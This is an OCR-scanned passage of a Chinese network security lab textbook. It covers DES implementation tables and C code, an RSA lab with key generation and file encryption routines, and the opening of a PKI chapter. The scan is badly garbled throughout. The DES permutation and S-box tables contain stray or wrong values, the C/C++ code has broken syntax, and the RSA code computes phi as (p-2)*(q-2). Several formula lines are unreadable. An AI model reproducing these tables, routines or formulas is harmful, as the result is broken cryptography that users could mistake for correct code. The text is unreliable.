5,45, 13,53, 21, 61,29, 36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19,59, 27, 34, 2, 42,10, 50, 18, 58, 26, 33, 1, 41, 9, 49,17,57, 
255 
static const char e table[48]- (32,1, 2, 3, 4, 5,4, 5, 6, 7, 8, 9,8, 9,10,11,12,13,12, 13,14, 15,16, 17,16, 17,18, 
19,20,21,20, 21, 22, 23, 24, 25, 24, 25, 26, 21, 28, 29, 28, 29, 30, 31, 32,1); 
const static char p table[32]- (16, 7,20,21,29,12,28, 17, 1, 15, 23, 26, 5, 18, 31, 10, 2, 8, 24, 14, 32, 21, 3, 9,19, 13, 30, 
6,22,11,4,25); 
const static char pcl table[56]- ( 

51,49,41,33,25,11, 9,1, 

58,50, 42, 34, 26, 18,10,2, 


59,51,43,35,27,19,11,3, 


60,52,44, 36, 63, 55, 47,39, 


31,23, 15, 7, 2,54, 46, 38, 

30,22, 14, 6, 61,53, 45, 37, 

29,21,13,5,28,20,12,4 
IE 


const static char pc2 table[48]- ( 


14,17,11,24,1,5,3,28, 
15,6,21,10,23,19,12,4, 
26,8,16, 7,27,20,13,2, 


41, 52,31, 37, 41, 55, 30, 40, 
51,45, 33, 48, 44, 49, 39, 56, 


34,53, 46, 42, 50, 36, 29, 32 
H 


const static char loop table[16]= (1,1,2,2,2,2,2,2,1,2,2, 
const static char s box[8] [4] [16]- { 
14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 


0, 15, 7, 4, 14, 2, 13, 


2 
2,2,2,2,2, 


1, 10, 6, 12, 11, 9, 5, 3, 8, 


2 


5 


4, 1, 14, 8, 13, 
15, 12, 8, 2, 4, 


15, 1, 
3, 13, 
0, 14, 
13, 8, 
10, 0, 


8, 14, 6, 
4, 7, 15, 


6, 2, 11, 15, 12, 9, 7, 3, 
9, 1, 7, 5, 11, 3, 14, 10, 
11, 3, 4, 9, 7, 2, 13, 12, 
2, 8, 14, 12, 0, 1, 10, 6, 


10, 5, 0, 
0, 6, 13, 
0, 5, 10, 
9, 11, 5, 


7, 11, 10, 4, 13, 1, 5, 8, 
10, 1, 3, 15, 4, 2, 11, 6, 
9, 14, 6, 3, 15, 5, 1, 13, 


12, 6, 9, 3, 2, 15, 
7, 12, 0, 5, M, 9, 
12, 7, 11, 4, 2, 8, 


13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1, 
13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, M, 7, 
1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12, 
7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15, 


13, 8, 11, 5, 6, 15, 0, 
10, 6, 9, 0, 12, 11, 7, 
3, 15, 0, 6, 10, 1, 13, 
2, 12, 4, 1, 7, 10, 11, 


3, 4, 7, 2, 12, 1, 10, 14, 9, 
13, 15, 1, 3, 14, 5, 2, 8, 4, 
8, 9, 4, 5, 11, 12, 7, 2, M, 
6, 8, 5, 3, 15, 13, 0, 14, 9, 


14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6, 


4, 2, 1, 11, 10, 13, 7, 
11, 8, 12, 7, 1, 14, 2, 
12, 1, 10, 15, 9, 2, 6, 
10, 15, 4, 2, 7, 12, 9, 
9, 14, 15, 5, 2, 8, 12, 


8, 15, 9, 12, 5, 6, 3, 0, 14, 
13, 6, 15, 0, 9, 10, 4, 5, 3, 
8, 0, 13, 3, 4, 14, 7, 5, 11, 
5, 6 1, 13, 14, 0, 11, 3, 8, 
3, 7, 0, 4, 10, 1, 13, 11, 6, 


4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13, 


4, 11, 2, 14, 15, 0, 8, 


13, 3, 12, 9, 1, 5, 10, 6, 1, 


13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6, 


1, 4, 11, 13, 12, 3, 7, 
6, 11, 13, 8, 1, 4, 10, 
13, 2, 8, 4, 6, 15, 11, 


14, 10, 15, 6, 8, 0, 5, 9, 2, 
7, 9, 5, 0, 15, 14, 2, 3, 12, 
1, 10, 9, 3, 14, 5, 0, 22, 7, 


121}; 


第 3 章 ”DES 算 法 


13 


网 络 安全 与 管理 实验 教程 


1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2, 
7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8, 
2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11 
IE 
static bool subkey[16] [48]; 
void nn œs (char out [8], har in[8], bool type) 
{ 
static bool m[64],tmp[32], * li- &n[0], * ri= &n[32]; 
bytetobit (m, in, 64) ; 
des_transform(m,m,ip table, 64); 
if (type= = encrypt) { 
for(int i= O;i< 1l6;i+ +) { 
memcpy (tmp, ri, 32) ; 
f func(ri,subkey[i]); 
xor(ri,1i,32); 
Imemcpy (Li, tmp, 32) ; 
} 
Jeise( 
for (int i-15;i» - 0;ji- -)( 
memcpy (tmp, li, 32) ; 
f func(li,subkey[i]); 
xor(li,ri,32); 


memcpy (ri, tmp, 32) ; 


) 
des transform(mm,ipr table, 64); 
bittobyte (out,m, 64) ; 
) 
void des key(const char key[8]) 
t 
static bool k[64], * kl- &k[0], * k= &k[28]; 
bytetobit (k, key, 64) ; 
des transform(k,k,pcl table, 56); 
for (int i= 0;i« 16;i++) 
{ 
leftrotate(k1,28,1oop table[i]); 
leftrotate (kr,28,1ocp table[i]); 
des transfom(subkey[i],k,pc2 table, 48) ; 


} 
void £_func (bool in[32],const bool ki [48]) 
{ 

static bool mr[48]; 

des _transform(mr,in,e_table, 48); 

xor (mr, ki, 48) ; 
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s func(in,mr); 
des_transform(in,in,p table, 32); 


} 
void s func(bool out [32],const bool in[48]) 
{ 
for (char i=0,j,k;i< 8;i++,in+ = 6,out+=4) 
{ 
j= (in[0]<< 1)+ in[5]; 
k- (in[1]<<3)+ (in[2]<<2)+ (in[3]< < 1)+ in[4]; 
bytetobit (out,&s box[i] [j] [k], 4); 
) 
} 
void des_transform(bool * out,bool * in,const char * table, int len) 
{ 
static bool tmp[256]; 
for (int i= 0;i« len;i+ +) 
tmp[i]= in[table[i]- 1]; 
memcpy (out, tnp, len) ; 
} 
void xor (bool * ina,const bool * inb,int len) 
t 


for (int i= 0;i« len;i* +) 
ina[i]^-inb[i]; 
) 
void leftrotate (bool * in,int len,int loop) 


t 
static bool tmp[256]; 
memcpy (tmp, in, loop) ; 
memcpy (in, int logp, len- loop); 
memcpy (in+ len- loop, tmp, loop) ; 
H 
void bytetobit (bool * out,const char * in,int bits) 
t 
for (int i= 0;i< bits;i++) 
out [i]= (in[i/8]>> (i%8)) &l; 
} 
void bittobyte (char * out,const bool * in, int bits) 
{ 
memset (out, 0, (bits+ 7) /8) ; 
for(int i=0;i<bits;i++) 
out [1/8] |=in[i]<< (i%8); 
} 
void min () 
{ 


char key[8]= ('1*, '2*,'3*, "4, "5 '6, "7'},str[8]; 
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eune 


方法 。 


puts ("please input words"); 
gets (str); 

printf ("\n"); 

des_key (key) ; 

run des(str,str,encrypt); 
puts (str); 

printf ("\n"); 

run des (str, str, decrypt) ; 
puts (str); 

printf ("^n") ; 

printf ("^n") ; 


思考 问题 


. 在 DES 算法 中 , 密 钥 的 生成 主要 分 哪 几 步 ? 简 述 DES 算法 中 的 依次 迭代 过 程 。 

. 在 DES 算法 的 各 种 置换 中 ,哪个 置换 为 DES 提供 了 最 好 的 安全 性 ? 

. DES 算法 从 设计 角度 看 存在 哪些 缺陷 ? 

. 针对 DES 算法 的 分 析 方 法 有 哪些 ? 请 同学 查阅 相关 资料 , 列 出 两 种 DES 的 分 析 


Ant RSA 算法 
4.1 实验 目的 与 要 求 


。 了解 非 对称 加 密 机 制 。 
。 理解 RSA 算法 的 加 密 原 理 以 及 密 钥 生成 方法 。 
。 编程 实现 RSA 算法 。 


4.2 实验 环境 


在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003 ,在 交换 网 络 结构 下 ,每 组 两 人 ,使 
用 VC++ 6.0 和 系统 自 带 密码 工具 。 


4.3 背景 知识 


4.3.1. 非 对 称 加 密 算 法 


非 对 称 密 钥 加 密 体制 ,又 称 为 公 钥 密码 体制 , 双 密 钥 密 码 体制 。 它 是 指 对 信息 加 密 和 解 
密 时 所 使 用 的 密 钥 是 不 同 的 , 即 有 两 个 密 钥 ,一 个 是 可 以 公开 的 , 另 一 个 是 私有 的 ,这 两 个 密 
钥 组 成 一 对 密 钥 对 ,分 别 为 公开 密 钥 和 私有 密 钥 。 如 果 使 用 其 中 一 个 密 钥 对 数据 进行 加 密 ， 
则 只 有 用 另外 一 个 密 钥 才能 解密 。 由 于 加 密 和 解密 时 所 使 用 的 密 钥 不 同 ,这 种 加 密 体制 称 
为 非 对 称 密 钥 加 密 体 制 。 在 公开 密 钥 算法 中 ,用 公开 的 密 钥 进行 加 密 , 用 私有 密 钥 进 行 解密 
的 过 程 , 称 为 加 密 。 而 用 私有 密 钥 进行 加 密 , 用 公开 密 钥 进行 解密 的 过 程 称 为 认证 。 

公 钥 密码 系统 的 主要 目的 是 提供 保密 性 , 它 不 能 提供 数据 源 认 证 (data origin 
authentication) 和 数据 完整 性 (data integrity) 。 数 据 源 认证 是 指 , 指 定 的 数据 在 以 前 的 某 个 
时 间 确 实 是 由 真正 的 源 创建 的 。 数 据 完整 性 是 指 , 真 正 的 源 创 建 该 数据 后 经 过 传输 后 存储 
没有 发 生 改变 。 数 据 源 认证 和 数据 完整 性 要 由 其 他 技术 来 提供 (如 消息 认证 码 技术 .数字 签 
名 技术 等 )。 公 和 钥 解 密 也 可 以 提供 认证 保证 (如 在 实体 认证 协议 、 带 认证 的 密 钥 建立 协议 
等 )。 公 钥 加 密 中 必须 有 颁发 让 发 送 消息 的 人 得 到 想 要 发 送 到 的 那个 人 的 公 钥 的 真实 副本 ; 
否则 就 会 受到 伪装 攻击 。 在 实践 中 有 很 多 方法 分 发 真实 的 公 钥 ,如 使 用 可 信 的 公共 文件 .使 
用 在 线 可 信服 务 器 、 使 用 离线 服务 器 和 认证 。 

非 对 称 加 密 算法 与 对 称 加 密 算法 相 比 ,最 大 的 优点 是 其 安全 性 更 好 。 另 外 ,大 型 网 络 中 
的 每 个 用 户 需 要 的 密 钥 数量 少 ,而 且 对 管理 公 钥 的 可 信 第 三 方 的 信任 程度 要 求 不 高 。 缺 点 
则 是 加 密 和 解密 花费 时 间 长 .速度 慢 ,只 适合 对 少量 数据 进行 加 密 。 

公 钥 密码 的 概念 本 身 就 被 公认 为 是 密码 学 上 的 一 块 里 程 碑 。20 多 年 来 的 研究 表明 , 公 
钥 密 码 成 功 地 解决 了 计算 机 网 络 安全 中 的 密 钥 管理 ,身份 认 证 和 数字 签名 等 问题 ,已 经 成 为 
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信息 安全 技术 中 的 重大 核心 技术 。 
4.3.2 RSA 算法 概述 


RSA 加 密 算法 是 由 Ronal Rivest, Adi Shamir fll Len Adleman 这 3 位 年 轻 教授 于 1977 
年 共同 发 明 且 已 获得 专利 权 的 非 对 称 密 钥 密码 算法 ,现在 该 算法 已 经 公开 。RSA 是 第 一 个 
比较 完善 的 公开 密 钥 算 法 ,虽然 密码 分 析 者 既 不 能 证 明 也 不 能 否认 其 安全 性 ,但 RSA 算法 
经 受 住 了 多 年 深入 的 密码 分 析 , 说 明 它 具有 一 定 的 可 信 性 。RSA 的 安全 基于 大 数 分 解 的 难 
度 , 其 公 钥 和 私 钥 是 一 对 大 素数 (100 一 200 位 十 进 制 数 或 更 大 ) 的 函数 。 从 一 个 公 钥 和 密 文 
恢复 出 明文 的 难度 ,等 价 于 分 解 两 个 大 素数 之 积 ,这 是 公认 的 数学 难题 。RSA 算法 的 原理 
并 不 复杂 ,但 是 ,从 现实 的 角度 来 看 ,就 需要 解决 一 些 现实 的 问题 ,如 大 数 的 产生 和 存储 以 及 
判断 一 个 大 数 是 否 是 素数 及 大 数 的 运算 等 。 


4.3.3 RSA 算法 的 加 密 和 解密 过 程 


在 RSA 算法 中 ,每 个 实体 有 自己 的 公 钥 (e,m) 及 私 钥 Cd,z) EP n= papa 是 两 个 大 
BRO G0 — Cp—- D Gr — D «ed —1 mod h(n), BR e 应 该 满足 gedCesG0) — 1, KK B 
JE TH m ,将 密 文 在 公开 信道 上 传送 给 实体 A。 实 体 A 接 到 密 文 后 对 其 解密 。 具 体 算 法 
如 下 。 

1. 公私 钥 的 生成 算法 

RSA 的 公私 钥 生 成 算法 十 分 简单 ,可 以 分 为 5 步 : 

(1) 随机 地 选择 两 个 大 素数 p 和 g ,而 且 保 密 。 

(2) 计算 n— pq H n 公开。 

(3) 计算 $G0 — Co5— 1 Q— D ,对 (7) 保密 。 

(4) BEL E BE — I IE SEC e 1<e<(n) B.C G0) = 1.4% e AF. 

(5) 根据 ed —1 mod p(n) KB d ,并 对 d 保密 。 

公开 密 钥 由 (e,n) 构 成 ,私有 密 钥 由 (d,n) 构 成 。 

2. 加 密 算法 

实体 B 的 操作 如 下 : 

(D 得 到 实体 A 的 真实 公 钥 (e.n)。 

(2) 把 消息 表示 成 整数 m CO m—n— 1D. 

(3) 使 用 平方 一 乘积 算法 ,计算 C=Ek(m) 二 me mod n. 

(A) 将 密 文 C 发 送 给 实体 A。 

3. 解密 算法 

实体 A 接收 到 密 文 C ,使 用 自己 的 私 钥 d ETE m — DR(C) —Cd mod n. 


4.4 实验 内 容 


学 习 RSA 生成 公 、 私 钥 及 加 密 过 程 和 解密 过 程 , 设 计 RSA 加 密 工 具 , 利 用 RSA 加 密 算 
法 对 文件 进行 加 密 。 
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4.5 实验 步骤 


4.5.1 RSA 生成 公私 钥 及 加 密 、 解 密 过 程 演 示 


CD 本 机 进入 "密码 工具 ”一 “加 密 解密 ”一 “RSA 加 密 算 法 ”对 话 框 ,打开 “公私 钥 ” 页 
签 , 在 生成 公私 钥 区 输入 素数 p 和 素数 g, 这 里 要 求 p 和 g 不 能 相等 (因为 很 容易 开平 方 求 
出 p 与 g WE) IFA p Sq 的 乘积 也 不 能 小 于 127( 因 为 小 于 127 不 能 包括 所 有 的 ASCII 


码 , 导 致 加 密 失败 ), 你 选用 的 素数 p 与 g 分 别 是 : p= ;9 一 
(2) Ha" BE Lie BOE SCC e" 下 拉 按 钮 ,在 下 拉 列 表 框 中 随机 选取 e, e= 。 选 
取 生 成 公私 钥 所 需 素 数 p、g 和 正 整 数 e。 过 程 演示 如 图 4. 1 所 示 。 
生成 公私 铀 
素数 pC0-251) : 四 ” ”素数 a(0-251) fT IRE: o ”加 
BBCend:¢ 四 ,得 (a: » 生成 公私 家 
图 4.1 选取 素数 和 正 整数 演示 
(3) 单 击 “ 生 成 公私 钥 ” 按 钮 生成 公私 钥 , 记 录 公 钥 为 ， 私 钥 为 
(A) 在 公私 钥 生 成 演示 区 中 输入 素数 p = 和 素数 q= ,还 有 正 整数 
e= 。 生 成 公私 钥 的 过 程 演示 如 图 4. 2 BEAR 
公私 钥 生成 演示 


素数 p: [1 nzpxac[r xf c.p an qr fer» 
素数 q: [To w= (p-1) x (-D-[i9 x[i = 阿 => S S 


ES8e:[0 exd=lanodubo du=[ aa (fa fier) 
cl uae 
图 4.2 生成 公私 钥 过 程 演示 

(5) 在 加 /解密 演示 区 中 输入 明文 m= AH n= On 23) A58] 
e= 。 单 击 “ 加 密 演 示 ” 按 钮 ,查看 RSA 加 密 过 程 ,然后 记录 得 到 的 密 文 
c= e 

(6) E 9E XC c 编辑 框 输入 刚刚 得 到 的 密 文 , 分 别 输入 私 钥 n = RH 
d= : 单 击 “ 解 密 演示 ”按钮 , 查看 RSA 解密 过 程 ,然后 记录 得 到 的 明文 


m= 


(7) 比较 解密 后 的 明文 与 原来 的 明文 是 否 一 致 。 
根据 实验 原理 中 对 RSA 加 密 算法 的 介绍 , 当 素数 p= 二 13, 素 数 — 17 EMR e — 143 
时 , 写 出 RSA 私 钥 的 生成 过 程 ， B 

当 公 钥 c= 143 时 , 写 出 对 明文 m — 40. 的 加 密 过 程 (加 密 过 程 计 算 量 比较 大 ,请 使 用 密 
码 工具 的 RSA 工具 进行 计算 ) : 
利用 生成 的 私 钥 4d, 对 生成 的 密 文 进 行 解密 : 
加 密 和 解密 过 程 演示 如 图 4. 3 所 示 。 
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-加 /解密 演示 - 

明文 na: [e [or 

Atn: [187 => cca'mán [s (nod fiT ) = Se: [tes 
Ate: [101 

xe: [i55 fa 


win: [j > n=cindn f (noa [187 ) = 明文 n: PS 
私 宜 d: fiat 


图 4.3 加 密 和 解密 过 程 演示 


4.5.2 RSA 加 密 解 密 


(1) 本 机 在 生成 公私 钥 区 输入 素数 p 和 素数 g ,这 里 要 求 p 和 g 不 能 相等 ,并 且 p Sq 
的 乘积 也 不 能 小 于 127 ,记录 你 输入 的 素数 ,pp 二 :0 一 
(2) 单 击 “ 随 机 选取 正 整数 e:" 下 拉 按 钮 ,在 弹出 的 下 拉 列 表 选 — 先 择 正 整数 e， 


(3) 单 击 “生成 公私 钥 ” 按 钮 生成 公私 钥 , 记 录 公 钥 e= ，n 二 E 
d- n= 。 将 自己 的 公 钥 通告 给 同 组 主机 。 生 成 公私 钥 过 程 如 图 4. 4 
所 示 。 
生成 公私 钥 
æo: fs aoso: fT 随机 过 取 正 整数 :3 ”加 
公 钥 (eva) :( [sgg > &coo:c m op > 生成 公私 外 


图 4.4 生成 公私 钥 


(4) 本 机 进入 "加 密 /解密 ?页 签 LES ZS A e 部 分 "和 “ 公 钥 部 分 "文本 框 中 分 别 输入 同 
组 主机 的 公 钥 ,在 明文 输入 区 输入 明文 : 

单 击 “ 加 密 ” 按 钮 对 明文 进行 加 密 , 单 击 “ 导 出 ”按钮 将 密 文 导出 到 RSA JE X HERE DN 
Work\Encryption\RSA\) rf ,通告 同 组 主机 获取 密 文 。 生 成 的 密 文 如 图 4.5 所 示 。 


MESH 

公 钥 部 分 : [o dama: pn m € 

wem 

分 R E 

明文 

| | 
加 

ex 

2, 198 E 
Lzl 


图 4.5 生成 的 密 文 
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O) 进入 “加 密 /解密 ”页 签 , 单 击 * 导 人 ”按钮 ,从 同 组 主机 的 RSA 共享 文件 夹 中 将 密 文 
导入 , 单 击 “ 解 密 ” 按 钮 ,切换 到 解密 模式 ,在 “ 私 钥 d 部 分 "和 “ 私 钥 n 部 分 "文本 框 中 分 别 输 
人 自己 的 私 钥 ,再 次 单 击 “ 解 密 ” 按 钮 进行 RSA 解密 。 生 成 的 明文 如 图 4.6 所 示 。 


mees 
a-mn:[ o ——— hi: [| im € 
FESB 
mama: 7 a: et ROE 
ax 
可 
ex 
198 p 
zu 


图 4.6 生成 的 明文 
C6) 将 破解 后 的 明文 与 同 组 主机 记录 的 明文 比较 。 


4.5.3 源码 应 用 


设计 RSA 加 密 工 具 , 利 用 RSA 加 密 算法 对 文件 进行 加 密 。 

启动 VC++ 6.0。 选 择 File Open Workspace 菜单 命令 .加载 工 程 文件 C:\ExpNIS\ 
Encrypt-Lab\Projects\ RSA\ RSA, dsw, 基 于 此 工程 进行 程序 设计 。 下面 给 出 两 个 参考 
例 程 。 

例 程 4.1 生成 密 钥 。 


key_generate.h 
# include 
class KEY GENERATE { 
public: 
KEY GENERATE () ; 
virtual-KEY GENEFATE(); 
public:int JudgePrime (unsigned int prime); 
int Count N Aola Num(unsigned int p, unsigned int q, unsigned int * ao la); 
int Produce RSA Key (unsigned int p,unsigned int q, unsigned int* Ke, unsigned int* Kd, unsigned int* 
model); 
KEY GENERATE::KEY GENERATE() {} 
KEY GENERATE::-KEY GENERATE() {} 
int KEY GENERATE::Produce RSA Key (unsigned int p,unsigned int q, unsigned int * Ke, unsigned int* Kd, 
unsigned int* model) 
t 
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unsigned int ao la; 
if (Cant N Acla Num(p, q, &ao la)) 
t 
if(RandSelect e(ao la, Ke)) 
{ 
if (OverOneNun( * Ke, ao la, Kd)) 
{ 
* mdel-p* q; retum 1; 
) 
) 
} 
retum 0; 
} 
int KEY_GENERATE: :JudgePrime (unsigned int prime) { 
unsigned int i; 
unsigned int limit- (unsigned int) sqrt ( (double)prime) ; 
for (i=2; i<= limit; i++) 
{ 
if (prime%i==0) 
{ 
return 0; 
} 
} 
retum 1; 
} 
int KEY GENERATE::Count N AoLa Num(unsigned int p, unsigned int q, unsigned int * ao la) { 
if (!JudgePrime(p)) retum 0; 
if(!JudgePrime(g)) retum 0; 
* ao læ (p- 2) * (a- 2); 
retum 1; ) 
unsigned int KEY GENERATE: :CountCanmonData (unsigned int a, unsigned int b) { 
unsigned int c; 
if (c= a%b) 
return CountCammonData (b,c) ; 
else 
return b; } 
int KEY_GENERATE: :RandSelect_e (unsigned int ao la, unsigned int* e) { 
unsigned int tmp; 
unsigned int div; 
if(ao lac-2) 
t 
retum 0; } 
srand(time (0)) ; 
div-ao la-2; 
do 
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t 
tmp- ((unsigned int)rand()* 90)$div* 2; 
} 

while (CountConmonData (tmp, ao 1a) != 1); 
* ep; 

retum 1; 


H 


unsigned int KEY GENERATE: :GetOutNum (unsigned int b,unsigned int e, unsigned int d) ( 


unsigned int i; 
unsigned int cutNum- 1; 
for(i-0; i&lte; i++) 
t 
outNum * =b; 
if (outNum> = d) 
outNums= d; 
if (!outNum) 
return outNum; 
H 
retum outNum&d; 
} 
unsigned int i; 
unsigned int over=e; 
for (i= 1; i&ltmodel;) 
{ 
over- oversimodel; 
if(over--1) 
{ 
*dei; 
return 1; 


{ 
do 
{ Boe or 

overt-e; } 
while (over+ ex —model); 
} 

else { i++; 
overt-e; } 

id 

retum 0; } 


unsigned int KEY GENERATE: :CountAnyNumola (unsigned int number) 
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unsigned int ao la-1; 

unsigned int i; if(nmber«- 1) 

printf ("Not processing number less than 2!\n"); 

for (i=2; igltmumber i++) 

{ 

if (CountCammonData (number, i)==1) aolatt; } 
retum ao la; 

) 


例 程 4. 2 ”加密 过 程 。 


encryp.h 
class ENCRYPT { 
public: ENCRYPT(); 
virtual ~ENCRYPT (); 
void Encrypt (UINT PublicKey, UINT mod, FIIE* fipRe, FILE* fipWr,char* extrName); 
void Explain(UINT PrivateKey, UINT mod, FIE* fipRe，FTIEx fipWr); 
void TxtEncrypt(unsigned* cipSourceTxt, int buffSize, unsigned int Ke, unsigned int model); 
private: unsigned int GetOutNum (unsigned int b,unsigned int e, unsigned int d); 
i 
encrypt .gp 
ENCRYPT: :ENCRYPT() { } 
ENCRYPT: :~ENCRYPT() { } 
void ENCRYPT: :TxtEncrypt (nsignedx cipSourceTxt, int buffSize, unsigned int Ke, unsigned int model) 
{ inti; 
for (i=0; i«buffSize; i++) 
{ cipSourceTxt[i]- GetOutNum(cipSourceTxt[i], Ke, model); } 
} 
unsigned int ENCRYPT: :GetOutNum (unsigned int b,unsigned int e, unsigned int d) 
{unsigned int i; 
unsigned int outNum- 1; 
for(i-0; i«e; i++) 
{ outNum * =b; 
if (outNum> =d) 
{ outNum&- d; } 
if (!outNum) 
return outNum; 
} 
return outNum&d; } 
void ENCRYPT: :Encrypt (UINT Publickey, UINT mod, FIIE* fipRe, FIIE* fipwr, dar* extrName) 
{ unsigned int ReSize; 
unsigned int uBuf [BUFFER_SIZE]= {0,}; 
char cBuf [BUFFER SIZE]; 
unsigned int i; 
for (i= 0; i&lt3; i++) 
{ 
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if (extrName) 
{ uBuf [i]= 0; 
* ((char* ) (&uBuf [i]) )= extreme [1] 
} 
else 
uBuf [i]= 0; 
} 
if(extrName) 
TxtEncrypt (uBuf, 3, PublicKey,mod) ; 
fwrite((char* )uBuf,1, 3* sizeof (unsigned int), fipwr); 
do { 
ReSize- fread(cBuf, 1, BUFFER_SIZE, fipRe); 
if (ReSize) 
t 
unsigned int record- 1; 
unsigned int WrNum; 
for(i-0; i<ReSize; i++) 
{ 
uBuf [i]= 0; 
* ((char* ) (&uBuf [i]))= (Buf [i]) 
} 
TxtEncrypt (uBuf, ReSize, Publickey,mod) ; 
WrNum- fwrite((char* )uBuf,l, ReSize* sizeof (unsigned int), fipWr); 
printf ("$d TIME WRITE%d BYTE! \n",record+ + , WrNum); 
) 
}while (ReSize= = BUFFER SIZE); 
} 
void ENCRYPT::Explain(UINT PrivateKey, UINT mod, FILE* fipRe, FIIE* fipWr) { 
unsigned int FeSize; 
unsigned int uBuf [BUFFER_SIZE]= (0, }; 
char cBuf[BUFFER SIZE]; 
do ( 
ReSize- fread(uBuf, sizeof (unsigned int), BUFFER SIZE, fipRe); 
if (ReSize) 
{ 
unsigned int i; 
unsigned int record- 1; 
unsigned int WrNum; 
TxtEncrypt (uBuf, ReSize, PrivateKey,mod) ; 
for(i-0; i&ltReSize; i++) 
cBat[i]- (char) (Buf [1]) 7 
WrNum- fwrite (cBuf,1,ReSize, fipWr); 
printf ("$d TIME WRITESd BYTES!\n",record+ + ,WrNum); } 
}while (ReSize= = BUFFER_SIZE); 
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4.6 


e uNe 


思考 问题 


. 公开 密 钥 体制 的 主要 特点 是 什么 ? 
. 简 述 RSA 的 公 钥 生成 算法 。 

. RSA 是 否 抗 攻击 ? 

.如 何 提高 RSA 的 运行 效率 ? 


57% PKI 证 书 应 用 


5.1 实验 目的 与 要 求 


* 了解 PKI 体 系 . 工 作 原 理 、 技 术 背 景 。 

: 了解 用 户 进行 证 书 申请 和 CA 颁发 证 书 过 程 。 
© 人 掌握 认证 服务 的 安装 及 配置 方法 。 

* 掌握 使 用 数字 证 书 配置 安全 站 点 的 方法 。 


5.2 实验 环境 


在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003 ,在 交换 网 络 结构 下 ,每 组 3 人 。 
5.3 背景 知识 


5.3.1 PKI 原理 及 特点 


公 钥 基础 设施 (Public Key Infrastructure,PKI) 是 目前 网 络 安全 建设 的 基础 与 核心 ,是 
实施 电子 商务 .电子 政务 安全 的 基本 保障 。 信 息 安全 的 目的 是 建立 电子 世界 里 的 信任 关系 ， 
保证 信息 的 真实 性 完整 性 .机 密 性 和 不 可 否认 性 ,PKI 是 解决 这 一 系列 问题 的 技术 基础 。 
PKI 本 身 是 利用 公 钥 理论 和 技术 建立 的 提供 信息 认证 安全 服务 的 基础 设施 。 

PKI 的 基本 思路 是 信任 关系 的 管理 和 实现 信任 关系 的 传递 。 第 三 方 信任 和 直接 信任 是 
所 有 网 络 安全 产品 实现 的 基础 ,第 三 方 信任 是 指 两 个 人 可 以 通过 第 三 方 间接 地 达到 彼此 信 
任 。 当 两 个 卫生 人 都 和 同一 个 第 三 方 彼 此 信任 , 且 第 三 方 出 示 了 他 们 的 可 信 证 明 时 ,这 两 个 
陌生 人 就 可 以 做 到 彼此 信任 。 在 分 布 式 大 规模 网 络 中 ,PKI 体系 中 提供 了 认证 中 心 CA 
(Certificate Authority) 作 为 这 样 的 可 信 第 三 方 。 

通过 自动 管理 密 钥 和 证 书 ,为 用 户 建 立 一 个 安全 的 网 络 运行 环境 ,使 用 户 可 以 在 多 种 应 
用 环境 下 方便 地 使 用 加 密 和 数字 签名 技术 ,从 而 保证 网 上 数据 的 完整 性 .机 密 性 .不 可 否 
5.3.2 PKI 组 件 


PKI 主要 包括 认证 中 心 CA ,注册 机 构 RA、 证 书 服务 器 .证 书库 .时 间 服 务 器 和 PKI R 
略 等 。 

(D CA. 

CA 是 PKI 的 核心 ,是 PKI 应 用 中 权威 的 .可 信任 的 .公正 的 第 三 方 机 构 。 
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CA 的 核心 功能 就 是 发 放 和 管理 数字 证 书 , 具 体 描述 如 下 : 

OD 接受 验证 最 终 用 户 数字 证 书 的 申请 。 

@ 确定 是 否 接 受 最 终 用 户 数 字 证 书 的 申请 。 

@ 向 申请 者 颁发 或 拒绝 颁发 数字 证 书 。 

D 接受 、 处 理 最 终 用 户 的 数字 证 书 更 新 请 求 。 

C) 接受 最 终 用 户 数字 证 书 的 查询 .撤销 。 

© 产生 和 发 布 证 书 吊销 列表 (CRL) 。 

C 数字 证 书 的 归档 。 

@ 密 钥 归档 。 

© 历史 数据 归档 。 

TR CA 证 书 是 一 种 特殊 的 证 书 , 它 使 用 CA 自己 的 私 钥 对 自己 的 信息 和 公 钥 进行 签名 。 

(2) RA。 

RA 负责 申请 者 的 登记 和 初始 鉴别 ,在 PKI 体系 结构 中 起 承上启下 的 作用 ,一 方面 向 
CA 转发 安全 服务 器 传输 过 来 的 证 书 申请 请 求 , 另 一 方面 向 LDAP 服务 器 和 安全 服务 器 转 
发 CA 颁发 的 数字 证 书 和 证 书 撤销 列表 。 

(3) 证 书 服务 器 。 

证 书 服务 器 负责 根据 注册 过 程 中 提供 的 信息 生成 证 书 的 机 器 或 服务 。 

(4) 证 书库 。 

证 书库 是 发 布 证 书 的 地 方 ,提供 证 书 的 分 发 机 制 。 到 证 书库 访问 可 以 得 到 希望 与 之 通 
信 的 实体 的 公 钥 和 查询 最 新 的 CRL。 它 一 般 采 用 LDAP 目录 访问 协议 ,其 格式 符合 X. 500 

(5) 时 间 服 务 器 。 

提供 单调 增加 的 精确 的 时 间 源 ,并 且 安 全 的 传输 时 间 蕉 , 对 时 间 蕉 签名 以 验证 可 信和 时 间 
值 的 发 布 者 。 

(6) PKI 策略 。 

PKI 安全 策略 建立 和 定义 了 一 个 组 织 信息 安全 方面 的 指导 方针 ,同时 也 定义 了 密码 系 
统 使 用 的 处 理 方法 和 原则 。 它 包括 一 个 组 织 怎样 处 理 密 钥 和 有 价值 的 信息 ,根据 风险 的 级 
别 定义 安全 控制 的 级 别 。 


5.3.3 证 书 应 用 


基于 PKI 的 服务 就 是 提供 常用 PKI 功能 的 可 复 用 函数 ,这 些 服务 包括 数字 签名 、 身 份 
